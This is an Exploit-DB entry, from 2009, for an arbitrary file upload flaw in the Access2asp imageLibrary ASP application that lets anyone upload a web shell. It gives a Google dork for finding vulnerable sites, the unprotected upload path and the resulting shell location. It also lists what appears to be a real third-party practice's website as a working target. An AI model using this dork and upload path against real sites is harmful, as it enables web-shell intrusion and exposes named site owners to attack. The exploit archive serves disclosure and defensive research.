Access2asp - 'imageLibrar' Arbitrary File Upload

EDB-ID:

8132

CVE:

N/A

EDB Verified:

Author:

mr.al7rbi

Type:

webapps

Exploit: /

Platform:

ASP

Date:

2009-03-02

Vulnerable App:

                         ||          ||   | ||        
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
                  ( :   /    (_)    /           (   .  


################################################################
#           upload shell
#
#           Found by ::: mr.al7rbi
#
#           Contact  ::: n16 [at] live.com
#
#           my Group ::: islam-defenders Team
#
################################################################


[+] Title: imageLibrary


[dork]

inurl:"default_Image.asp"

[+] EXPLOITS:

http://www.site.com/imageLibrary//admin/images/default_Image.asp

[exp:]  

http://www.davidhalpernmd.com/manage_tbps/default_Image.asp

[demo]

]http://www.access2asp.com/imageLibraryDemo/admin/images/default_Image.asp

[shell be like ]

http://www.access2asp.com/imageLibraryDemo/admin/images/win.asp


[+] Special  Greetz for :  www.sec-code.com

[+] Greetz : MaTrEx  & samkmk.almkkar & 3lo0osh  &  ili The General ili & Super-Code & BxH &all tryag members & all muslims

# milw0rm.com [2009-03-02]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services